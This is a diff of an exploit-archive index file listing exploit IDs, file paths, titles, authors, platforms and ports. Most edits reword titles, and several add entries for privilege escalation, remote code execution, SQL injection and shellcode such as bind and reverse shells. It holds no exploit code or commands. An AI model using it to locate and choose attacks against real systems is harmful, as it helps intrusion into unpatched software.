 40988,platforms/windows/local/40988.c,"Kaspersky 17.0.0 - Local CA root Incorrectly Protected",2017-01-04,"Google Security Research",windows,local,0
 7264,platforms/windows/local/7264.txt,"Apache Tomcat (Windows) - 'runtime.getRuntime().exec()' Privilege Escalation",2008-11-28,Abysssec,windows,local,0
@ -6194,10 +6198,10 @@ id,file,description,date,author,platform,type,port
 7329,platforms/windows/local/7329.py,"Cain & Abel 4.9.23 - '.rdp' Buffer Overflow",2008-12-03,Encrypt3d.M!nd,windows,local,0
 7334,platforms/windows/local/7334.pl,"RadASM 2.2.1.5 - '.rap' WindowCallProcA Pointer Hijack Exploit",2008-12-03,DATA_SNIPER,windows,local,0
 7347,platforms/windows/local/7347.pl,"PEiD 0.92 - Malformed '.PE' File Universal Buffer Overflow",2008-12-05,SkD,windows,local,0
-7393,platforms/linux/local/7393.txt,"PHP - Safe_mode Bypass via proc_open() and custom Environment",2008-12-09,gat3way,linux,local,0
+7393,platforms/linux/local/7393.txt,"PHP - 'Safe_mode' Bypass via 'proc_open()' and custom Environment",2008-12-09,gat3way,linux,local,0
 7492,platforms/windows/local/7492.py,"Realtek Sound Manager (rtlrack.exe 1.15.0.0) - Playlist Buffer Overflow",2008-12-16,shinnai,windows,local,0
 7501,platforms/windows/local/7501.asp,"Microsoft SQL Server - sp_replwritetovarbin() Heap Overflow",2008-12-17,"Guido Landi",windows,local,0
-7503,platforms/multiple/local/7503.txt,"PHP python extension safe_mode - Bypass Local",2008-12-17,"Amir Salmani",multiple,local,0
+7503,platforms/multiple/local/7503.txt,"PHP 'python' Extension - 'safe_mode' Local Bypass Exploit",2008-12-17,"Amir Salmani",multiple,local,0
 7516,platforms/windows/local/7516.txt,"ESET Smart Security 3.0.672 - 'epfw.sys' Privilege Escalation",2008-12-18,"NT Internals",windows,local,0
 7533,platforms/windows/local/7533.txt,"PowerStrip 3.84 - 'pstrip.sys' Privilege Escalation",2008-12-21,"NT Internals",windows,local,0
 7536,platforms/windows/local/7536.cpp,"CoolPlayer 2.19 - '.Skin' Local Buffer Overflow",2008-12-21,r0ut3r,windows,local,0
@ -8293,7 +8297,7 @@ id,file,description,date,author,platform,type,port
 28405,platforms/linux/local/28405.txt,"Roxio Toast 7 - DejaVu Component PATH Variable Privilege Escalation",2006-08-18,Netragard,linux,local,0
 28425,platforms/solaris/local/28425.txt,"Sun Solaris 8/9 UCB/PS - Command Local Information Disclosure",2006-03-27,anonymous,solaris,local,0
 28427,platforms/novell/local/28427.pl,"Novell Identity Manager - Arbitrary Command Execution",2006-08-18,anonymous,novell,local,0
-28504,platforms/php/local/28504.php,"PHP 3 < 5 - Ini_Restore() Safe_mode and open_basedir Restriction Bypass",2006-09-09,"Maksymilian Arciemowicz",php,local,0
+28504,platforms/php/local/28504.php,"PHP 3 < 5 - Ini_Restore() 'Safe_mode' / 'open_basedir' Restriction Bypass",2006-09-09,"Maksymilian Arciemowicz",php,local,0
 28507,platforms/aix/local/28507.sh,"IBM AIX 6.1 / 7.1 - Privilege Escalation",2013-09-24,"Kristian Erik Hermansen",aix,local,0
 28576,platforms/osx/local/28576.txt,"Apple Mac OSX 10.x - KExtLoad Format String",2006-09-14,"Adriel T. Desautels",osx,local,0
 40376,platforms/windows/local/40376.txt,"Multiple Icecream Apps - Insecure File Permissions Privilege Escalation",2016-09-13,Tulpa,windows,local,0
@ -8322,7 +8326,7 @@ id,file,description,date,author,platform,type,port
 29194,platforms/osx/local/29194.c,"Apple Mac OSX 10.4.x - AppleTalk AIOCRegLocalZN IOCTL Stack Buffer Overflow",2006-11-27,LMH,osx,local,0
 29201,platforms/osx/local/29201.c,"Apple Mac OSX 10.4.x - Shared_Region_Make_Private_Np Kernel Function Local Memory Corruption",2006-11-29,LMH,osx,local,0
 29234,platforms/windows/local/29234.py,"VideoCharge Studio 2.12.3.685 - Buffer Overflow (SEH)",2013-10-27,metacom,windows,local,0
-29239,platforms/php/local/29239.txt,"PHP 5.2 - Session.Save_Path() Safe_mode and open_basedir Restriction Bypass",2006-12-08,"Maksymilian Arciemowicz",php,local,0
+29239,platforms/php/local/29239.txt,"PHP 5.2 - Session.Save_Path() 'Safe_mode' / 'open_basedir' Restriction Bypass",2006-12-08,"Maksymilian Arciemowicz",php,local,0
 29327,platforms/windows/local/29327.py,"Watermark Master 2.2.23 - Buffer Overflow (SEH)",2013-11-01,metacom,windows,local,0
 29263,platforms/windows/local/29263.pl,"BlazeDVD 6.2 - '.plf' Buffer Overflow (SEH)",2013-10-28,"Mike Czumak",windows,local,0
 29309,platforms/windows/local/29309.pl,"AudioCoder 0.8.22 - '.m3u' Buffer Overflow (SEH)",2013-10-30,"Mike Czumak",windows,local,0
@ -8337,7 +8341,7 @@ id,file,description,date,author,platform,type,port
 30021,platforms/solaris/local/30021.txt,"Sun Microsystems Solaris SRSEXEC 3.2.x - Arbitrary File Read Local Information Disclosure",2007-05-10,anonymous,solaris,local,0
 30014,platforms/windows/local/30014.py,"Microsoft Windows - 'NDPROXY' SYSTEM Privilege Escalation (MS14-002)",2013-12-03,ryujin,windows,local,0
 29547,platforms/windows/local/29547.rb,"VideoSpirit Pro 1.90 - Buffer Overflow (SEH)",2013-11-12,metacom,windows,local,0
-29528,platforms/php/local/29528.txt,"PHP 5.2 - FOpen Safe_mode Restriction-Bypass",2007-01-26,"Maksymilian Arciemowicz",php,local,0
+29528,platforms/php/local/29528.txt,"PHP 5.2 - FOpen 'Safe_mode' Restriction Bypass Exploit",2007-01-26,"Maksymilian Arciemowicz",php,local,0
 29548,platforms/windows/local/29548.rb,"VideoSpirit Lite 1.77 - Buffer Overflow (SEH)",2013-11-12,metacom,windows,local,0
 29549,platforms/windows/local/29549.pl,"ALLPlayer 5.6.2 - '.m3u' File Local Buffer Overflow (Unicode SEH)",2013-11-12,"Mike Czumak",windows,local,0
 29594,platforms/windows/local/29594.txt,"Watermark Master 2.2.23 - '.wstyle' Buffer Overflow (SEH)",2013-11-14,"Mike Czumak",windows,local,0
@ -8432,14 +8436,14 @@ id,file,description,date,author,platform,type,port
 32158,platforms/windows/local/32158.txt,"iCAM Workstation Control 4.8.0.0 - Authentication Bypass",2014-03-10,StealthHydra,windows,local,0
 32205,platforms/windows/local/32205.txt,"Huawei Technologies eSpace Meeting Service 1.0.0.23 - Privilege Escalation",2014-03-12,LiquidWorm,windows,local,0
 32261,platforms/windows/local/32261.rb,"MicroP 0.1.1.1600 - '.mppl' Local Stack Based Buffer Overflow",2014-03-14,"Necmettin COSKUN",windows,local,0
-32343,platforms/php/local/32343.php,"PHP 5.2.5 - Multiple functions 'safe_mode_exec_dir' and 'open_basedir' Restriction Bypass Vulnerabilities",2008-09-08,Ciph3r,php,local,0
+32343,platforms/php/local/32343.php,"PHP 5.2.5 - Multiple functions 'safe_mode_exec_dir' / 'open_basedir' Restriction Bypass Vulnerabilities",2008-09-08,Ciph3r,php,local,0
 32358,platforms/windows/local/32358.pl,"MP3Info 0.8.5a - Buffer Overflow (SEH)",2014-03-19,"Ayman Sagy",windows,local,0
 32370,platforms/hardware/local/32370.txt,"Quantum vmPRO 3.1.2 - Privilege Escalation",2014-03-19,xistence,hardware,local,0
 32446,platforms/linux/local/32446.txt,"Xen 3.3 - XenStore Domain Configuration Data Unsafe Storage",2008-09-30,"Pascal Bouchareine",linux,local,0
 32501,platforms/multiple/local/32501.txt,"NXP Semiconductors MIFARE Classic Smartcard - Multiple Security Weaknesses",2008-10-21,"Flavio D. Garcia",multiple,local,0
 32585,platforms/windows/local/32585.py,"AudioCoder 0.8.29 - Memory Corruption (SEH)",2014-03-30,sajith,windows,local,0
 32590,platforms/windows/local/32590.c,"Microsoft Windows Vista - 'iphlpapi.dll' Local Kernel Buffer Overflow",2008-11-19,"Marius Wachtler",windows,local,0
-32693,platforms/php/local/32693.php,"suPHP 0.7 - 'suPHP_ConfigPath' Safe Mode Restriction-Bypass",2008-12-31,Mr.SaFa7,php,local,0
+32693,platforms/php/local/32693.php,"suPHP 0.7 - 'suPHP_ConfigPath' Safe_Mode() Restriction Bypass Exploit",2008-12-31,Mr.SaFa7,php,local,0
 32700,platforms/linux/local/32700.rb,"ibstat $PATH - Privilege Escalation (Metasploit)",2014-04-04,Metasploit,linux,local,0
 32737,platforms/windows/local/32737.pl,"BlazeDVD Pro Player 6.1 - Stack Based Buffer Overflow Jump ESP",2014-04-08,"Deepak Rathore",windows,local,0
 32751,platforms/lin_x86-64/local/32751.c,"Systrace 1.x (x64) - Aware Linux Kernel Privilege Escalation",2009-01-23,"Chris Evans",lin_x86-64,local,0
@ -8459,7 +8463,7 @@ id,file,description,date,author,platform,type,port
 32891,platforms/windows/local/32891.txt,"Microsoft Windows XP/Vista/2003/2008 - WMI Service Isolation Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0
 32892,platforms/windows/local/32892.txt,"Microsoft Windows XP/2003 - RPCSS Service Isolation Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0
 32893,platforms/windows/local/32893.txt,"Microsoft Windows Vista/2008 - Thread Pool ACL Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0
-32901,platforms/php/local/32901.php,"PHP 5.2.9 cURL - 'Safe_mode' and 'open_basedir' Restriction-Bypass",2009-04-10,"Maksymilian Arciemowicz",php,local,0
+32901,platforms/php/local/32901.php,"PHP 5.2.9 cURL - 'Safe_mode' / 'open_basedir' Restriction Bypass Exploit",2009-04-10,"Maksymilian Arciemowicz",php,local,0
 32946,platforms/freebsd/local/32946.c,"FreeBSD 7.1 libc - Berkley DB Interface Uninitialized Memory Local Information Disclosure",2009-01-15,"Jaakko Heinonen",freebsd,local,0
 32947,platforms/linux/local/32947.txt,"DirectAdmin 1.33.3 - '/CMD_DB' Backup Action Insecure Temporary File Creation",2009-04-22,anonymous,linux,local,0
 33012,platforms/windows/local/33012.c,"Microsoft Windows XP/2000/2003 - Desktop Wall Paper System Parameter Privilege Escalation",2009-02-02,Arkon,windows,local,0
@ -9106,6 +9110,7 @@ id,file,description,date,author,platform,type,port
 42174,platforms/windows/local/42174.py,"Easy MOV Converter 1.4.24 - 'Enter User Name' Buffer Overflow (SEH)",2017-06-13,abatchy17,windows,local,0
 42181,platforms/windows/local/42181.py,"VX Search Enterprise 9.7.18 - Local Buffer Overflow",2017-06-15,ScrR1pTK1dd13,windows,local,0
 42183,platforms/linux/local/42183.c,"Sudo 1.8.20 - 'get_process_ttyname()' Privilege Escalation",2017-06-14,"Qualys Corporation",linux,local,0
 42255,platforms/linux/local/42255.py,"JAD Java Decompiler 1.5.8e - Buffer Overflow",2017-06-26,"Juan Sacco",linux,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -10386,7 +10391,7 @@ id,file,description,date,author,platform,type,port
 9649,platforms/windows/remote/9649.txt,"Xerver HTTP Server 4.32 - Arbitrary Source Code Disclosure",2009-09-11,Dr_IDE,windows,remote,0
 9650,platforms/windows/remote/9650.txt,"Kolibri+ Web Server 2 - Arbitrary Source Code Disclosure (2)",2009-09-11,Dr_IDE,windows,remote,0
 9651,platforms/multiple/remote/9651.txt,"Mozilla Firefox < 3.0.14 - Multiplatform Remote Code Execution via pkcs11.addmodule",2009-09-11,"Dan Kaminsky",multiple,remote,0
-9652,platforms/windows/remote/9652.sh,"Oracle Secure Backup Server 10.3.0.1.0 - Authentication Bypass/RCI Exploit",2009-09-14,ikki,windows,remote,80
+9652,platforms/windows/remote/9652.sh,"Oracle Secure Backup Server 10.3.0.1.0 - Authentication Bypass / Remote Code Injection Exploit",2009-09-14,ikki,windows,remote,80
 9658,platforms/hardware/remote/9658.txt,"Neufbox NB4-R1.5.10-MAIN - Persistent Cross-Site Scripting",2009-09-14,"599eme Man",hardware,remote,0
 9660,platforms/windows/remote/9660.pl,"Techlogica HTTP Server 1.03 - Arbitrary File Disclosure",2009-09-14,"ThE g0bL!N",windows,remote,0
 9662,platforms/windows/remote/9662.c,"IPSwitch IMAP Server 9.20 - Remote Buffer Overflow",2009-09-14,dmc,windows,remote,143
@ -12454,7 +12459,7 @@ id,file,description,date,author,platform,type,port
 21152,platforms/linux/remote/21152.c,"ActivePerl 5.6.1 - 'perlIIS.dll' Buffer Overflow (1)",2001-11-15,Indigo,linux,remote,0
 21153,platforms/windows/remote/21153.c,"ActivePerl 5.6.1 - 'perlIIS.dll' Buffer Overflow (2)",2001-11-15,Indigo,windows,remote,0
 21154,platforms/multiple/remote/21154.pl,"ActivePerl 5.6.1 - 'perlIIS.dll' Buffer Overflow (3)",2001-11-15,Sapient2003,multiple,remote,0
-21155,platforms/php/remote/21155.txt,"Network Tool 0.2 PHP-Nuke Addon - MetaCharacter Filtering Command Execution",2001-11-16,"Cabezon AurÃ©lien",php,remote,0
+21155,platforms/php/remote/21155.txt,"PHP-Nuke Network Tool 0.2 Addon - MetaCharacter Filtering Command Execution",2001-11-16,"Cabezon AurÃ©lien",php,remote,0
 21156,platforms/windows/remote/21156.txt,"Opera 5.0/5.1 - Same Origin Policy Circumvention",2001-11-15,"Georgi Guninski",windows,remote,0
 21160,platforms/multiple/remote/21160.txt,"ibm informix Web Datablade 3.x/4.1 - Directory Traversal",2001-11-22,"Beck Mr.R",multiple,remote,0
 21161,platforms/unix/remote/21161.txt,"WU-FTPD 2.6 - File Globbing Heap Corruption",2001-11-27,"Core Security Technologies",unix,remote,0
@ -13803,7 +13808,7 @@ id,file,description,date,author,platform,type,port
 27428,platforms/hardware/remote/27428.rb,"D-Link Devices - 'tools_vct.xgi' Unauthenticated Remote Command Execution (Metasploit)",2013-08-08,Metasploit,hardware,remote,0
 27429,platforms/windows/remote/27429.rb,"Mozilla Firefox - onreadystatechange Event DocumentViewerImpl Use-After-Free (Metasploit)",2013-08-08,Metasploit,windows,remote,0
 27452,platforms/hardware/remote/27452.txt,"F5 Firepass 4100 SSL VPN - Cross-Site Scripting",2006-03-21,"ILION Research",hardware,remote,0
-27508,platforms/php/remote/27508.txt,"PHP 4.x/5.x - Html_Entity_Decode() Information Disclosure",2006-03-29,Samuel,php,remote,0
+27508,platforms/php/remote/27508.txt,"PHP 4.x/5.x - 'Html_Entity_Decode()' Information Disclosure",2006-03-29,Samuel,php,remote,0
 27523,platforms/windows/remote/27523.py,"Sami FTP Server 2.0.1 - MKD Buffer Overflow ASLR Bypass (SEH)",2013-08-12,Polunchis,windows,remote,21
 27526,platforms/windows/remote/27526.txt,"Oracle Java - storeImageArray() Invalid Array Indexing",2013-08-12,"Packet Storm",windows,remote,0
 27527,platforms/multiple/remote/27527.rb,"Ruby on Rails - Known Secret Session Cookie Remote Code Execution (Metasploit)",2013-08-12,Metasploit,multiple,remote,0
@ -13818,7 +13823,7 @@ id,file,description,date,author,platform,type,port
 27569,platforms/windows/remote/27569.txt,"UltraVNC 1.0.1 - Multiple Remote Error Logging Buffer Overflow Vulnerabilities (2)",2006-04-04,"Luigi Auriemma",windows,remote,0
 27577,platforms/windows/remote/27577.txt,"Microsoft Internet Explorer 5 - Address Bar Spoofing",2006-04-03,"Hai Nam Luke",windows,remote,0
 27595,platforms/php/remote/27595.txt,"PHP 4.x - tempnam() Function open_basedir Restriction Bypass",2006-04-10,"Maksymilian Arciemowicz",php,remote,0
-27596,platforms/php/remote/27596.txt,"PHP 4.x - copy() Function Safe Mode Bypass",2006-04-10,"Maksymilian Arciemowicz",php,remote,0
+27596,platforms/php/remote/27596.txt,"PHP 4.x - 'copy()' Function 'Safe_Mode' Bypass Exploit",2006-04-10,"Maksymilian Arciemowicz",php,remote,0
 27806,platforms/windows/remote/27806.txt,"BankTown ActiveX Control 1.4.2.51817/1.5.2.50209 - Remote Buffer Overflow",2006-05-03,"Gyu Tae",windows,remote,0
 27606,platforms/windows/remote/27606.rb,"Intrasrv 1.0 - Buffer Overflow (Metasploit)",2013-08-15,Metasploit,windows,remote,80
 27607,platforms/windows/remote/27607.rb,"MiniWeb 300 - Arbitrary File Upload (Metasploit)",2013-08-15,Metasploit,windows,remote,8000
@ -14236,7 +14241,7 @@ id,file,description,date,author,platform,type,port
 31050,platforms/multiple/remote/31050.php,"Firebird 2.0.3 Relational Database - 'protocol.cpp' XDR Protocol Remote Memory Corruption",2008-01-28,"Damian Frizza",multiple,remote,0
 31051,platforms/linux/remote/31051.txt,"Mozilla Firefox 2.0 - 'chrome://' URI JavaScript File Request Information Disclosure",2008-01-19,"Gerry Eisenhaur",linux,remote,0
 31052,platforms/linux/remote/31052.java,"Apache 2.2.6 mod_negotiation - HTML Injection and HTTP Response Splitting",2008-01-22,"Stefano Di Paola",linux,remote,0
-31053,platforms/php/remote/31053.php,"PHP 5.2.5 - cURL 'safe mode' Security Bypass",2008-01-23,"Maksymilian Arciemowicz",php,remote,0
+31053,platforms/php/remote/31053.php,"PHP 5.2.5 - cURL 'safe_mode' Security Bypass Exploit",2008-01-23,"Maksymilian Arciemowicz",php,remote,0
 31056,platforms/windows/remote/31056.py,"Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Vulnerabilities",2008-01-23,"Felipe M. Aragon",windows,remote,0
 40358,platforms/linux/remote/40358.py,"LamaHub 0.0.6.2 - Buffer Overflow",2016-09-09,Pi3rrot,linux,remote,4111
 31072,platforms/windows/remote/31072.html,"Symantec Backup Exec System Recovery Manager 7.0 - FileUpload Class Unauthorized File Upload",2007-01-05,titon,windows,remote,0
@ -14698,7 +14703,7 @@ id,file,description,date,author,platform,type,port
 33964,platforms/windows/remote/33964.txt,"X-Motor Racing 1.26 - Buffer Overflow / Multiple Denial of Service Vulnerabilities",2010-05-06,"Luigi Auriemma",windows,remote,0
 33971,platforms/windows/remote/33971.c,"Rebellion Aliens vs Predator 2.22 - Multiple Memory Corruption Vulnerabilities",2010-05-07,"Luigi Auriemma",windows,remote,0
 33920,platforms/php/remote/33920.php,"PHP 5.3 - 'PHP_dechunk()' HTTP Chunked Encoding Integer Overflow",2010-05-02,"Stefan Esser",php,remote,0
-33988,platforms/php/remote/33988.txt,"PHP 5.x (5.3.x 5.3.2) - 'ext/phar/stream.c' and 'ext/phar/dirstream.c' Multiple Format String Vulnerabilities",2010-05-14,"Stefan Esser",php,remote,0
+33988,platforms/php/remote/33988.txt,"PHP 5.3.x < 5.3.2 - 'ext/phar/stream.c' / 'ext/phar/dirstream.c' Multiple Format String Vulnerabilities",2010-05-14,"Stefan Esser",php,remote,0
 33989,platforms/windows/remote/33989.rb,"Oracle Event Processing FileUploadServlet - Arbitrary File Upload (Metasploit)",2014-07-07,Metasploit,windows,remote,9002
 33929,platforms/multiple/remote/33929.py,"Gitlist 0.4.0 - Remote Code Execution",2014-06-30,drone,multiple,remote,0
 33935,platforms/windows/remote/33935.txt,"rbot 0.9.14 - '!react' Command Unauthorized Access",2010-02-24,nks,windows,remote,0
@ -15463,7 +15468,7 @@ id,file,description,date,author,platform,type,port
 40130,platforms/php/remote/40130.rb,"Drupal Module RESTWS 7.x - Remote PHP Code Execution (Metasploit)",2016-07-20,"Mehmet Ince",php,remote,80
 40136,platforms/linux/remote/40136.py,"OpenSSHd 7.2p2 - Username Enumeration",2016-07-20,0_o,linux,remote,22
 40138,platforms/windows/remote/40138.py,"TFTP Server 1.4 - 'WRQ' Buffer Overflow (Egghunter)",2016-07-21,"Karn Ganeshen",windows,remote,69
-40142,platforms/php/remote/40142.php,"Apache 2.4.7 + PHP 7.0.2 - openssl_seal() Uninitialized Memory Code Execution",2016-02-01,akat1,php,remote,0
+40142,platforms/php/remote/40142.php,"Apache 2.4.7 + PHP 7.0.2 - 'openssl_seal()' Uninitialized Memory Code Execution",2016-02-01,akat1,php,remote,0
 40144,platforms/php/remote/40144.php,"Drupal Module Coder < 7.x-1.3 / 7.x-2.6 - Remote Code Execution (SA-CONTRIB-2016-039)",2016-07-23,Raz0r,php,remote,0
 40146,platforms/linux/remote/40146.rb,"Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Remote Command Execution (Metasploit)",2016-07-25,xort,linux,remote,8000
 40147,platforms/linux/remote/40147.rb,"Barracuda Spam & Virus Firewall 5.1.3.007 - Remote Command Execution (Metasploit)",2016-07-25,xort,linux,remote,8000
@ -15595,6 +15600,7 @@ id,file,description,date,author,platform,type,port
 41694,platforms/multiple/remote/41694.rb,"SSH - User Code Execution (Metasploit)",1999-01-01,Metasploit,multiple,remote,0
 41695,platforms/linux/remote/41695.rb,"Redmine SCM Repository - Arbitrary Command Execution (Metasploit)",2010-12-19,Metasploit,linux,remote,0
 41795,platforms/linux/remote/41795.rb,"SolarWinds LEM 6.3.1 - Remote Code Execution (Metasploit)",2017-03-17,"Mehmet Ince",linux,remote,0
 42256,platforms/windows/remote/42256.rb,"Easy File Sharing HTTP Server 7.2 - POST Buffer Overflow (Metasploit)",2017-06-17,Metasploit,windows,remote,80
 41987,platforms/windows/remote/41987.py,"Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",windows,remote,0
 41718,platforms/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",hardware,remote,0
 41719,platforms/hardware/remote/41719.rb,"NETGEAR WNR2000v5 - (Un)authenticated hidden_lang_avi Stack Overflow (Metasploit)",2017-03-24,Metasploit,hardware,remote,80
@ -15623,7 +15629,7 @@ id,file,description,date,author,platform,type,port
 41964,platforms/macos/remote/41964.html,"Apple Safari 10.0.3 - 'JSC::CachedCall' Use-After-Free",2017-05-04,"saelo and niklasb",macos,remote,0
 41975,platforms/windows/remote/41975.txt,"Microsoft Security Essentials / SCEP (Microsoft Windows 8/8.1/10 / Windows Server) - 'MsMpEng' Remotely Exploitable Type Confusion",2017-05-09,"Google Security Research",windows,remote,0
 41978,platforms/multiple/remote/41978.py,"Oracle GoldenGate 12.1.2.0.0 - Unauthenticated Remote Code Execution",2017-05-09,"Silent Signal",multiple,remote,0
-41980,platforms/python/remote/41980.rb,"Crypttech CryptoLog - Remote Code Execution (Metasploit)",2017-05-09,Metasploit,python,remote,80
+41980,platforms/python/remote/41980.rb,"Crypttech CryptoLog - Remote Code Execution (Metasploit)",2017-05-09,"Mehmet Ince",python,remote,80
 41992,platforms/windows/remote/41992.rb,"Microsoft IIS - WebDav 'ScStoragePathFromUrl' Overflow (Metasploit)",2017-05-11,Metasploit,windows,remote,0
 41996,platforms/php/remote/41996.sh,"Vanilla Forums < 2.3 - Remote Code Execution",2017-05-11,"Dawid Golunski",php,remote,0
 42010,platforms/linux/remote/42010.rb,"Quest Privilege Manager - pmmasterd Buffer Overflow (Metasploit)",2017-05-15,Metasploit,linux,remote,0
@ -15653,6 +15659,8 @@ id,file,description,date,author,platform,type,port
 42175,platforms/android/remote/42175.html,"Google Chrome - V8 Private Property Arbitrary Code Execution",2017-06-14,Qihoo360,android,remote,0
 42176,platforms/hardware/remote/42176.py,"HP PageWide Printers / HP OfficeJet Pro Printers (OfficeJet Pro 8210) - Arbitrary Code Execution",2017-06-14,"Jacob Baines",hardware,remote,9100
 42186,platforms/windows/remote/42186.py,"Easy File Sharing Web Server 7.2 - 'POST' Buffer Overflow (DEP Bypass)",2017-06-15,"bl4ck h4ck3r",windows,remote,0
 42251,platforms/python/remote/42251.rb,"Symantec Messaging Gateway 10.6.2-7 - Remote Code Execution (Metasploit)",2017-06-26,"Mehmet Ince",python,remote,443
 42257,platforms/cgi/remote/42257.rb,"Netgear DGN2200 - dnslookup.cgi Command Injection (Metasploit)",2017-06-26,Metasploit,cgi,remote,80
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -16295,6 +16303,7 @@ id,file,description,date,author,platform,type,port
 42177,platforms/lin_x86/shellcode/42177.c,"Linux/x86 - XOR encoded execve(/bin/sh) setuid(0) setgid(0) Shellcode (66 bytes)",2017-06-15,nullparasite,lin_x86,shellcode,0
 42179,platforms/lin_x86-64/shellcode/42179.c,"Linux/x86_64 - execve(_/bin/sh_) Shellcode (24 bytes)",2017-06-15,m4n3dw0lf,lin_x86-64,shellcode,0
 42208,platforms/lin_x86/shellcode/42208.nasm,"Linux/x86 - Reverse UDP Shellcode (668 bytes)",2017-06-20,"DONTON Fetenat C",lin_x86,shellcode,0
 42254,platforms/lin_x86/shellcode/42254.c,"Linux/x86 - Bind Shell Shellcode (75 bytes)",2017-06-26,wetw0rk,lin_x86,shellcode,0
 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@ -16580,7 +16589,7 @@ id,file,description,date,author,platform,type,port
 1567,platforms/php/webapps/1567.php,"RedBLoG 0.5 - 'cat_id' SQL Injection",2006-03-08,x128,php,webapps,0
 1569,platforms/asp/webapps/1569.pl,"d2kBlog 1.0.3 - (memName) SQL Injection",2006-03-09,DevilBox,asp,webapps,0
 1570,platforms/php/webapps/1570.pl,"Light Weight Calendar 1.x - (date) Remote Code Execution",2006-03-09,Hessam-x,php,webapps,0
-1571,platforms/asp/webapps/1571.htm,"JiRos Banner Experience 1.0 - (Create Authentication Bypass) Remote Exploit",2006-03-09,nukedx,asp,webapps,0
+1571,platforms/asp/webapps/1571.htm,"JiRos Banner Experience 1.0 - Create Authentication Bypass Remote Exploit",2006-03-09,nukedx,asp,webapps,0
 1575,platforms/php/webapps/1575.pl,"Guestbook Script 1.7 - (include_files) Remote Code Execution",2006-03-11,rgod,php,webapps,0
 1576,platforms/php/webapps/1576.txt,"Jupiter CMS 1.1.5 - Multiple Cross-Site Scripting",2006-03-11,Nomenumbra,php,webapps,0
 1581,platforms/php/webapps/1581.pl,"Simple PHP Blog 0.4.7.1 - Remote Command Execution",2006-03-13,rgod,php,webapps,0
@ -16830,7 +16839,7 @@ id,file,description,date,author,platform,type,port
 1957,platforms/php/webapps/1957.pl,"Scout Portal Toolkit 1.4.0 - 'forumid' Parameter SQL Injection",2006-06-27,simo64,php,webapps,0
 1959,platforms/php/webapps/1959.txt,"RsGallery2 < 1.11.2 - 'rsgallery.html.php' File Inclusion",2006-06-28,marriottvn,php,webapps,0
 1960,platforms/php/webapps/1960.php,"Blog:CMS 4.0.0k - SQL Injection",2006-06-28,rgod,php,webapps,0
-1961,platforms/php/webapps/1961.txt,"XOOPS myAds Module - (lid) SQL Injection",2006-06-28,KeyCoder,php,webapps,0
+1961,platforms/php/webapps/1961.txt,"XOOPS myAds Module - 'lid' SQL Injection",2006-06-28,KeyCoder,php,webapps,0
 1963,platforms/php/webapps/1963.txt,"GeekLog 1.4.0sr3 - (_CONF[path]) Remote File Inclusion",2006-06-29,Kw3[R]Ln,php,webapps,0
 1964,platforms/php/webapps/1964.php,"GeekLog 1.4.0sr3 - 'f(u)ckeditor' Remote Code Execution",2006-06-29,rgod,php,webapps,0
 1968,platforms/php/webapps/1968.php,"DZCP (deV!L_z Clanportal) 1.34 - 'id' SQL Injection",2006-07-01,x128,php,webapps,0
@ -17547,7 +17556,7 @@ id,file,description,date,author,platform,type,port
 2944,platforms/php/webapps/2944.txt,"VerliAdmin 0.3 - 'index.php' Remote File Inclusion",2006-12-18,Kacper,php,webapps,0
 2945,platforms/php/webapps/2945.txt,"Uploader & Downloader 3.0 - (id_user) SQL Injection",2006-12-18,"the master",php,webapps,0
 2948,platforms/php/webapps/2948.txt,"RateMe 1.3.2 - 'main.inc.php' Remote File Inclusion",2006-12-18,"Al7ejaz Hacker",php,webapps,0
-2953,platforms/php/webapps/2953.php,"PHP-Update 2.7 - extract() Authentication Bypass / Shell Inject Exploit",2006-12-19,rgod,php,webapps,0
+2953,platforms/php/webapps/2953.php,"PHP-Update 2.7 - 'extract()' Authentication Bypass / Shell Inject Exploit",2006-12-19,rgod,php,webapps,0
 2955,platforms/php/webapps/2955.txt,"Paristemi 0.8.3b - 'buycd.php' Remote File Inclusion",2006-12-19,nuffsaid,php,webapps,0
 2956,platforms/php/webapps/2956.txt,"phpProfiles 3.1.2b - Multiple Remote File Inclusion",2006-12-19,nuffsaid,php,webapps,0
 2957,platforms/php/webapps/2957.txt,"PHPFanBase 2.x - 'protection.php' Remote File Inclusion",2006-12-19,"Cold Zero",php,webapps,0
@ -23042,7 +23051,7 @@ id,file,description,date,author,platform,type,port
 11631,platforms/php/webapps/11631.txt,"PHP-Nuke - user.php SQL Injection",2010-03-04,"Easy Laster",php,webapps,0
 11634,platforms/hardware/webapps/11634.pl,"Sagem Routers - Remote Authentication Bypass",2010-03-04,AlpHaNiX,hardware,webapps,0
 11635,platforms/php/webapps/11635.pl,"OneCMS 2.5 - SQL Injection",2010-03-05,"Ctacok and .:[melkiy]:",php,webapps,0
